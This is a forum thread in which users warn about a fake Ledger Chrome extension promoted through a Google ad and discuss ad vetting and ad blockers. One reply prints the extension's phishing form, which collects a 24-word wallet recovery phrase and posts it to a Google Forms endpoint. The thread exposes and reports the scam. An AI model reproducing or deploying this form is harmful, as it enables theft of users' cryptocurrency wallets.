cryptomaniac_xxx (OP)
|
|
July 20, 2020, 03:16:27 PM |
|
1. Go to Google 2. Type "ledger live' 3. The first search returns an Ad, looks legit right? 4. But when you click on it, you will be redirected to ... wait for it. 5. A fake and malicious apps on their Google chrome store. https://chrome.google.com/webstore/detail/nanoledger/oiekmlochkbifklpcbokmbbpihdneoln Checking a bit further (curiosity kicks in), looking at the manifest.json, seems to be writing to a google docs file here: https://clients2.google.com/service/update2/crx Below is the complete code. { "browser_action": { "default_icon": { "256": "icons/icon-256.png" }, "default_popup": "index.html", "default_title": "NanoLedger" }, "description": "New NanoLedger, more secure, fast confirm transaction.", "icons": { "128": "icons/icon-128.png", "16": "icons/icon-16.png", "32": "icons/icon-32.png", "64": "icons/icon-64.png" }, "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAgx54FjY2SgL8lJFz8BdKMXyOUbI2vCy20X15LMjcPPQpHLDLXWx1j2kVU3NuiL6mA80IbYfZWcs2I0/c0+st30ktRbSbGtoUVenJtWbBzMxHT2vnYe8SzjGwY6nCH467QrW6Yakfb2auHWmTDu380mV2Cx8lW47K9fnGS8d4t9suXSrjZFyo4prBEO5JK7w4xDiGHMXJw4iql3DmoQcBxZGSZiS8jhy54UOjB3Tr6u1vJITSCV2CPmr7+8sHpDCffjXJ6cIiJ6N5eD/nY3mSEuwuhy78NKnTuxsBUJTRlkf6nYWntVeEgfw7PE+rN0u+ZS8pTdQLRy7PNt//5gzp5wIDAQAB", "manifest_version": 2, "name": "NanoLedger", "update_url": "https://clients2.google.com/service/update2/crx", "version": "1.0" So please kindly help me report this malicious apps...
|
|
|
|
AB de Royse777
Legendary
Offline
Activity: 2660
Merit: 4093
Campaign Manager. My Telegram @Royse777
|
|
July 20, 2020, 03:19:18 PM |
|
Not sure how fast it will work but you can try this: https://support.google.com/webmasters/answer/93713?hl=enAbout how the ad gone live? Don't expect the AI to work and verify like human. In google when ads are created, an automated system review it before publishing. So, we see this kind of mistakes very often.
|
..Stake.com.. | | | ▄████████████████████████████████████▄ ██ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ██ ▄████▄ ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██ ██████ ██ ██████████ ██ ██ ██████████ ██ ▀██▀ ██ ██ ██ ██████ ██ ██ ██ ██ ██ ██ ██████ ██ █████ ███ ██████ ██ ████▄ ██ ██ █████ ███ ████ ████ █████ ███ ████████ ██ ████ ████ ██████████ ████ ████ ████▀ ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██ ██ ▀▀▀▀▀▀▀▀▀▀ ██ ▀█████████▀ ▄████████████▄ ▀█████████▀ ▄▄▄▄▄▄▄▄▄▄▄▄███ ██ ██ ███▄▄▄▄▄▄▄▄▄▄▄▄ ██████████████████████████████████████████ | | | | | | ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ █ ▄▀▄ █▀▀█▀▄▄ █ █▀█ █ ▐ ▐▌ █ ▄██▄ █ ▌ █ █ ▄██████▄ █ ▌ ▐▌ █ ██████████ █ ▐ █ █ ▐██████████▌ █ ▐ ▐▌ █ ▀▀██████▀▀ █ ▌ █ █ ▄▄▄██▄▄▄ █ ▌▐▌ █ █▐ █ █ █▐▐▌ █ █▐█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█ | | | | | | ▄▄█████████▄▄ ▄██▀▀▀▀█████▀▀▀▀██▄ ▄█▀ ▐█▌ ▀█▄ ██ ▐█▌ ██ ████▄ ▄█████▄ ▄████ ████████▄███████████▄████████ ███▀ █████████████ ▀███ ██ ███████████ ██ ▀█▄ █████████ ▄█▀ ▀█▄ ▄██▀▀▀▀▀▀▀██▄ ▄▄▄█▀ ▀███████ ███████▀ ▀█████▄ ▄█████▀ ▀▀▀███▄▄▄███▀▀▀ | | | ..PLAY NOW.. |
|
|
|
stompix
Legendary
Offline
Activity: 3066
Merit: 6627
Leading Crypto Sports Betting & Casino Platform
|
|
July 20, 2020, 03:30:45 PM |
|
3. The first search returns an Ad, looks legit right? 4. But when you click on it, you will be redirected to ... wait for it.
Wait, did you get redirected when you click the ledger.com link or the ad, as the ad that google shows me is nothing even close to...legit ? Without my Adblock my result page looks like this:
|
..Stake.com.. | | | ▄████████████████████████████████████▄ ██ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ██ ▄████▄ ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██ ██████ ██ ██████████ ██ ██ ██████████ ██ ▀██▀ ██ ██ ██ ██████ ██ ██ ██ ██ ██ ██ ██████ ██ █████ ███ ██████ ██ ████▄ ██ ██ █████ ███ ████ ████ █████ ███ ████████ ██ ████ ████ ██████████ ████ ████ ████▀ ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██ ██ ▀▀▀▀▀▀▀▀▀▀ ██ ▀█████████▀ ▄████████████▄ ▀█████████▀ ▄▄▄▄▄▄▄▄▄▄▄▄███ ██ ██ ███▄▄▄▄▄▄▄▄▄▄▄▄ ██████████████████████████████████████████ | | | | | | ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ █ ▄▀▄ █▀▀█▀▄▄ █ █▀█ █ ▐ ▐▌ █ ▄██▄ █ ▌ █ █ ▄██████▄ █ ▌ ▐▌ █ ██████████ █ ▐ █ █ ▐██████████▌ █ ▐ ▐▌ █ ▀▀██████▀▀ █ ▌ █ █ ▄▄▄██▄▄▄ █ ▌▐▌ █ █▐ █ █ █▐▐▌ █ █▐█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█ | | | | | | ▄▄█████████▄▄ ▄██▀▀▀▀█████▀▀▀▀██▄ ▄█▀ ▐█▌ ▀█▄ ██ ▐█▌ ██ ████▄ ▄█████▄ ▄████ ████████▄███████████▄████████ ███▀ █████████████ ▀███ ██ ███████████ ██ ▀█▄ █████████ ▄█▀ ▀█▄ ▄██▀▀▀▀▀▀▀██▄ ▄▄▄█▀ ▀███████ ███████▀ ▀█████▄ ▄█████▀ ▀▀▀███▄▄▄███▀▀▀ | | | ..PLAY NOW.. |
|
|
|
seoincorporation
Legendary
Offline
Activity: 3332
Merit: 3115
|
|
July 20, 2020, 03:40:58 PM |
|
Google policy to review and verify apps before adding them to the store is terrible. They are good only at focusing how much is the client paying for each click. We can call this a SEO attack.
|
|
|
|
AhmadM
|
|
July 20, 2020, 03:41:56 PM |
|
Yeah, I have the same result as well here I guess he was pointed the wrong site, what he pointed are the real ones in my honest opinion Already reported both of ads and app, hope google can take of it as soon as possible
|
|
|
|
TryNinja
Legendary
Offline
Activity: 3010
Merit: 7419
Top Crypto Casino
|
|
July 20, 2020, 04:14:45 PM |
|
Checking a bit further (curiosity kicks in), looking at the manifest.json, seems to be writing to a google docs file here: https://clients2.google.com/service/update2/crx Below is the complete code. So please kindly help me report this malicious apps...That's not the code. It's just the extension manifest. The link you posted is Google's update service URL which extensions to auto-update in people's browsers. Here is the actual code (part of it): <form id="form" action="https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/formResponse" method="post" target="hidden_iframe" autocomplete="off"> <iframe name="hidden_iframe" id="hidden_iframe" style="display:none;"></iframe> <div class="row"> <input id="Field" name="entry.1148436374" placeholder="Please type your 24 words recovery phrase, with one space between each word." type="text" required> </div> <input type="hidden" name="entry.304429919" value="Ledger"> </div> <div> <button id="send" type="submit" class="common_btn">Restore</button> </div> </form>Option 2: Or upload your HTML document UTF-8 Indentation level: 3 spaces per indent level FORMAT HTML FORMAT HTML IN NEW WINDOW Formatted HTML: <form id="form" action="https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/formResponse" method="post" target="hidden_iframe" autocomplete="off"> <iframe name="hidden_iframe" id="hidden_iframe" style="display:none;"></iframe> <div class="row"> <input id="Field" name="entry.1148436374" placeholder="Please type your 24 words recovery phrase, with one space between each word." type="text" required> </div> <input type="hidden" name="entry.304429919" value="Ledger"> </div> <div> <button id="send" type="submit" class="common_btn">Restore</button> </div> </form> It asks for your 24 word seed and sends it through Google forms, all while copying Ledger Live's design. We can report the form by clicking in "Report abuse" in the bottom and selecting Spam, malware or "phishing" (fake login). Also flooding them with fake data so they have a less chance of scamming people. https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform << SCAM!!!
|
|
|
|
sujonali1819
Legendary
Offline
Activity: 2450
Merit: 1189
Need Campaign Manager?PM on telegram @sujonali1819
|
|
July 20, 2020, 04:30:41 PM |
|
Wait, did you get redirected when you click the ledger.com link or the ad,
I have also the same question. the screenshot what the op provided is redirected to me a https://www.ledger. com/ledger-live. it seems legit. But the add redirected to new fake chrome extension. and not only the word ''ledger'' live I have searched ''Nano price'' and see the same add by google on the top. Just report these add. and don't try download anything without from official sources.
|
. .BLACKJACK ♠ FUN. | | | ███▄██████ ██████████████▀ ████████████ █████████████████ ████████████████▄▄ ░█████████████▀░▀▀ ██████████████████ ░██████████████ █████████████████▄ ░██████████████▀ ████████████ ███████████████░██ ██████████ | | CRYPTO CASINO & SPORTS BETTING | | │ | | │ | .
|
|
|
|
2chase
|
|
July 20, 2020, 04:36:07 PM |
|
|
|
|
|
SquirrelJulietGarden
|
|
July 20, 2020, 04:48:11 PM |
|
You will be safe if you don't forget basic rule. Don't believe in search results from Google or any search engines. You can use them but need to search with two or three engines and compare results.
Apps, don't search and download them on mobile. Visit sites that you bookmark, remember if search and double check, to get links to apps on stores. Use the search box in app stores to find apps are so stupid.
|
|
|
|
coupable
|
|
July 20, 2020, 05:53:56 PM |
|
You will be safe if you don't forget basic rule. Don't believe in search results from Google or any search engines. You can use them but need to search with two or three engines and compare results.
Apps, don't search and download them on mobile. Visit sites that you bookmark, remember if search and double check, to get links to apps on stores. Use the search box in app stores to find apps are so stupid.
That's right and should be treated with extreme caution when looking for important results. However, google is still responsible for the kind of ads accepted in the first page results. I remember facing the same issue with Epaiements company about two years ago when the ads links redirect to a fake copy of the website and ask for login info. Managing ads shouldn't be fully automated imo. But who know better than google.
|
|
|
|
20kevin20
Legendary
Offline
Activity: 1134
Merit: 1598
|
|
July 20, 2020, 06:37:47 PM |
|
3. The first search returns an Ad, looks legit right? That isn't an Ad. It's missing the "Ad" bolded term which should've been to the left side of the link and I think it's quite impossible for it to show up as " www.ledger.com" and redirect you to Chrome's web store.. unless you intentionally posted a screenshot of the legit link or they found a critical vulnerability in Google's security to make it show up as the legit link. Get an ad blocker and try to stop using Google. I hardly ever use it, and only when I really can't find the results I'm specifically looking for - they surely do have a better search AI, but otherwise I think I'm better without it.
|
|
|
|
ScamViruS
|
|
July 20, 2020, 06:53:32 PM |
|
I stopped believing in Google's ads long ago. They approve all kinds of ads to make money which is very dangerous for the users. I still don't know how google approves this type of ad. I have seen many scam websites running ads on google!
Depending on google, before downloading anything, you need to verify it yourself. Because if you are a victim of any kind of hacking, google will not take the responsibility, you have to take all the responsibility for your loss. So use ad blocker to stay safe in case of using google. Then google will not be able to promote such scams to you.
|
|
|
|
DdmrDdmr
Legendary
Offline
Activity: 2478
Merit: 11045
There are lies, damned lies and statistics. MTwain
|
|
July 20, 2020, 07:40:04 PM |
|
Beats me why anyone would go and spend some decent money on acquiring a Ledger device, and then failing to visit the original Ledger website to validate any related information they find on the internet, be it in an add or not.
Likely, having the "Add" besides de scam site gives the non-trained viewer an appearance of false security or trust in what they are seeing. Perhaps Google should step it up a bit, and besides providing astonishing business stats (Google’s advertising revenue was over 116 billion USD last year it seems), discern a way to better avoid such from happening with a quasi-legitimate aura as is happening now (for example add a visual indictor for "trusted" advertisers - i.e. those that have a long history as corporations, mid-way advertisers, and novel advertisers + further controls on their behalf).
|
|
|
|
wxa7115
|
|
July 20, 2020, 07:45:34 PM |
|
I stopped believing in Google's ads long ago. They approve all kinds of ads to make money which is very dangerous for the users. I still don't know how google approves this type of ad. I have seen many scam websites running ads on google!
Depending on google, before downloading anything, you need to verify it yourself. Because if you are a victim of any kind of hacking, google will not take the responsibility, you have to take all the responsibility for your loss. So use ad blocker to stay safe in case of using google. Then google will not be able to promote such scams to you.
This is simple they have so many clients that any kind of human audit is simply not possible or too costly for them to implement so they are depending on automated solutions to try to filter possible scams, as we know while this is cost-effective too many scams and fraud attempts pass through those filters damaging customers in the process. This is interesting, there was a time in which Google Ads were very effective but due to the lack of care for their clients more and more people are beginning to see those ads as a bother to the point they are blocking those ads as well with an ad blocker or they are preferring to use alternatives like duckduckgo.
|
|
|
|
JeromeTash
Legendary
Offline
Activity: 2324
Merit: 1258
Heisenberg
|
|
July 20, 2020, 10:05:38 PM |
|
1. Browser - Firefox 2. Search Engine - DuckDuck Go 3. Ad blocker - uBlock Origin Leads to People should avoid using the Google search engine and the Google Chrome browser.
|
|
|
|
LTU_btc
Legendary
Offline
Activity: 3234
Merit: 1374
Slava Ukraini!
|
|
July 20, 2020, 10:21:19 PM |
|
Nothing new, nothing surprising . I just want to ask, is it possible somehow to block these ads in search results using ad blocker? I'm very careful with clicking links, but I still afraid that I can click such link accidentally. 1. Browser - Firefox 2. Search Engine - DuckDuck Go 3. Ad blocker - uBlock Origin Leads to https://i.imgur.com/OxBSnHm.pngPeople should avoid using the Google search engine and the Google Chrome browser. Agree about Firefox and ad blocker. But it would be difficult to live without Google search engine. Do you really use DuckDuckGo as your main search engine? I have tried it several times and I was disappointed. Search results was so bad compared to Ggogle and it was too difficult to find what I was looking for. Don't even talk about languages other than English - with other languages it simply doesn't works and it's almost impossible to use this search engine.
|
|
|
|
mk4
Legendary
Offline
Activity: 2912
Merit: 3881
📟 t3rminal.xyz
|
|
July 21, 2020, 03:06:35 AM |
|
You will be safe if you don't forget basic rule. Don't believe in search results from Google or any search engines. You can use them but need to search with two or three engines and compare results.
I think that's over-complicating things a bit too much. Google's search results algorithm is freakin good in most cases unless you're searching for something way out of the ordinary, it's just that you need to ignore the ads being displayed. An easy solution is to simply just install an efficient browser adblock extension like uBlock Origin[1].
[1] https://github.com/gorhill/uBlock
|
|
|
|
anu1908
|
|
July 21, 2020, 05:16:56 AM |
|
i think this will keep happening in the next few years. it's probably hard to encode a scam/malware filter algorithm to an ai and train them, so they resort to the most cost-effective scenario, which is filter some basic words and wait for user report to delete the malicious ads. google have to level up their game.
|
|
|
|
OcTradism
|
|
July 21, 2020, 06:42:22 AM |
|
Apply my tutorial to safelvisit website and download official apps. People don't know those safely steps or being lazy and careless. Days ago, terrible hacks on famous Twitter accounts is another reason to not believe in update news, wallet/ app upgrade links on Twitter or any other platforms. I don't understand why people can believe in whatever posted or tweeted by official accounts with official/ legit marks. They believe in by default without questions and verifications Go to official apps, get links to download from sites and verify apps if possible. Even official websites can be compromised and unsafe. Monero website was compromised in the past several months. Officially visit websites & download apps, not fake ones.
|
| | . .Duelbits. | │ | ..........UNLEASH.......... THE ULTIMATE GAMING EXPERIENCE | │ | DUELBITS FANTASY SPORTS | ████▄▄▄█████▄▄▄ ░▄████████████████▄ ▐██████████████████▄ ████████████████████ ████████████████████▌ █████████████████████ ████████████████▀▀▀ ███████████████▌ ███████████████▌ ████████████████ ████████████████ ████████████████ ████▀▀███████▀▀ | . ▬▬ VS ▬▬ | ████▄▄▄█████▄▄▄ ░▄████████████████▄ ▐██████████████████▄ ████████████████████ ████████████████████▌ █████████████████████ ███████████████████ ███████████████▌ ███████████████▌ ████████████████ ████████████████ ████████████████ ████▀▀███████▀▀ | /// PLAY FOR FREE /// WIN FOR REAL | │ | ..PLAY NOW.. | |
|
|
|
Erumo
Member
Offline
Activity: 566
Merit: 50
|
|
July 21, 2020, 07:16:21 AM |
|
How can this crap sneak from google security? Or this is a new wave of hack attack, like on twitter and youtube previously?
I've done everything what was in first post and got redirected to ledger web page. After clicking download and choosing Google Play, got redirected to a store. App logo looks different like it is on screenshot in first post.
Using latest version of Chrome.
|
You mess with the meow meow You get the peow peow
|
|
|
|